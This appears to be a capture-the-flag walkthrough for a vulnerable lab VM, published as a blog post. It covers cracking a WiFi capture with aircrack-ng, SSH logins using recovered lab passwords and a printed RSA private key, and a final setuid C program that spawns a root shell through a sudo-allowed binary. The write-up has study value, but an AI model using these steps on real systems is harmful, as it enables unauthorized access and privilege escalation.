We can analyze the wytshadow.cap with Wireshark (GUI) software. However, we will try to analyze it with tcpdump (Terminal) software.

tcpdump pending

By the look of it, I am going to guess wytshadow as username and password are in the .cap file.

We can crack the password using aircrack-ng package with password dictionary list which we got from the victim machine – gold_star.txt .

aircrack-ng -w gold_star.txt wytshadow.cap

gaUoCe34t1

ssh wytshadow@192.168.56.26

password: gaUoCe34t1
```
./oohfun

control+c to stop the execution
```
I checked crontab and no entry was there.

let’s figure out whether any sudo enabled binary is there.
```
password: gaUoCe34t1
```
Yes, we got something

Let’s checkout nginx configuration file, enumerate on which port it is listening. You might think why I am all of sudden taking interest in the config file. It’s because sudo is enabled on nginx. Therefore, I am trying to find some information which could be leveraged.

cat /etc/nginx/sites-enabled/default

You can see that there is a service Lynx is going to run on port 8080, if nginx runs.

Let’s verify whether is there any process running with port 8080.

netstat -ntap

Actually, this is a redundant task because we know that from the nmap.log result, we can conclude that no service is running on port 8080.

Anyway, let’s start the nginx service and, I need to google and get to know little bit about Lynx service
```
/usr/sbin/service nginx start
```
now, Lynx is listening at port 8080.

I understood now the usage of Lynx. It is more like a browser for the command line. You can read more from here.

For our purpose, what we can do is
```
lynx http://192.168.56.26:8080
```
genphlux:HF9nd0cR!
```
ssh genphlux@192.168.56.26
```
password: HF9nd0cR!

ls

cat maleus

copied the content of the maleus to key
```
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwz5Hwer48U1t/Qi9JveuO+Z7WQlnmhOOs/2pZ0he/OyVsEFv
DsGib1wu/N8t+7h9JZK9x2GL33TXQBVCy6TxES90F1An+2DSza6lJPCyhcgK/DEp
yxSVt32A+lFo+PQJV6QYZlpRkek0MjUw5y/E5qZwdBypC55C4QzgQBN3+Lnuhuk4
u52xcK9/6/2N7JZCNYA21Tp1Uy9mty/65IT7OwKJd2rXp3O6rZYTD/vPl+Rt/LtN
gA1DbDODq0NCmvcrZL+SafSj+MABA3LCERw01gA4RMdyxJU6hVfjeSKOdwDQOGWe
eAVCL2GR/frwyf+rfN1kbpdw/RGXWWwVANMcaQIDAQABAoIBAGNudFztrZo2NK2I
pcwSl0kqN+dAQuLU0vgXVw6ibL2iPxlkOYrqUi8kY0mk32YyrolUEhJYO0Ox3W1l
Zn8PoTV/VUAKMlJzHOhi6PfHHSPEnNOSthYWhajM4cKZczxWC+v2RfbaSHBms45e
SGl0inJskRiRAAZKswSp6gq334FrS6Dwy1tiKvzCfR3kLQghV5U/PhFZCsq3xvAw
eXPx2toNtU2gYSGrKWTep+nAKM1neBxeZAujYuN4xJ5/Th2y0pyTvX9WEgzKPJ/G
PlYZYCUAKPCbabYSuZckjeiN1aS52AIFedECBfAIezOr08Wx/bI/xCOgBxrQgPrK
kRvlOYECgYEA5eCIEfdLhWdg3ltadYE0O5VAoXKrbxYWqSyw1Eyeqj0N1qD9Rsvg
jIQJazV5JcVBIF54f/jlCJozR5s5AELrY0Z/krea1lF5ecOSUQE3tp94298xzO3g
7BBe3g6pD56Cya/Vo0+YVQmAnBHLh6QIYvUUXXN2IyceT8fhEx5JA+sCgYEA2W4z
KKMVAdPxKcjVks1zdGmVlj1RsUkakYuLWV3jQe2w1naJrc37Khy5eWZaRJhXqeBb
1cvTMa+r/BF7jvItxglWoBJqXDxKI0a6KqWtloZL2ynoaBkAhR2btob6nSN63Bpg
ZYJKY1B5yYbDHK4k6QT7atn2g6DAv/7sW6skj/sCgYA16WTAIek6TjZvr6kVacng
N27C7mu6T8ncvzhxcc68SjlWnscHtYTiL40t8YqKCyrs9nr4OF0umUtxfbvujcM6
syv0Ms9DeDQvFGjaSpjQYbIsjrnVP+zCMEyvc2y+1wQBXRWTiXVGbEYXVC0RkKzO
2H+AMzX/pIr9Vvk4TJ//JQKBgFNJcy9NyO46UVbAJ49kQ6WEDFjQhEp0xkiaO3aw
EC1g7yw3m+WH0X4AIsvt+QXtlSbtWkA7I1sU/7w+tiW7fu0tBpGqfDN4pK1+mjFb
5XKTXttE4lF9wkU7Yjo42ib3QEivkd1QW05PtVcM2BBUZK8dyXDUrSkemrbw33j9
xbOhAoGBAL8uHuAs68ki/BWcmWUUer7Y+77YI/FFm3EvP270K5yn0WUjDJXwHpuz
Fg3n294GdjBtQmvyf2Wxin4rxl+1aWuj7/kS1/Fa35n8qCN+lkBzfNVA7f626KRA
wS3CudSkma8StmvgGKIU5YcO8f13/3QB6PPBgNoKnF5BlFFQJqhK
-----END RSA PRIVATE KEY-----
```
```
chmod 400 key
```
In my opinion, there might be username maleus and ssh key is the above key. Shall we try that ?
```
ssh maleus@192.168.56.26 -i key
```
indeed, it did work!

ls

dont_even_bother

file dont_even_bother

We understood it is an ELF 64-bit LSB executable.

Let’s execute it. (This approach is risk and provided you are a malware analyst, don’t execute anything on your host machine but virtual machine).

./dont_even_bother

It is expecting a password and I did try things which I could think of. No luck 🙁

Let me run a strings command

strings dont_even_bother | less

We got something interesting
screenshot
xl8Fpx%6

just a rabbit hole

cat /etc/os-release
```
VERSION="18.04.2 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.2 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic 
```
I am a little desperate here because I was not able to find anything useful. I checked the kernel version, OS release, crontab entries, history, etc..

When I tried
cat .viminfo | less
guess what I got ?

password: B^slc8I$ (I am not sure the use of it).

Shall we try sudo -i ?

No, it is not the password: B^slc8I$ (let’s keep with us a little while)

I tried sudo -l
password: B^slc8I$

Yeh! Finally…

We can use an exploit to escalate the privilege to root user.. because dont_even_bother is running with root privilege..

vi dont_even_bother
```
#include
#include
#include<sys/types.h>

int main()
{
setuid(geteuid());
system("/bin/bash");
return 0;
}
```
:wq! (To get out from vim – for new users)
source code credit

To compile it
```
gcc dont_even_bother.c -o dont_even_bother
```
some gibberish error may come, don’t worry about those..

Let’s execute our code

sudo ./dont_even_bother
July 9, 2020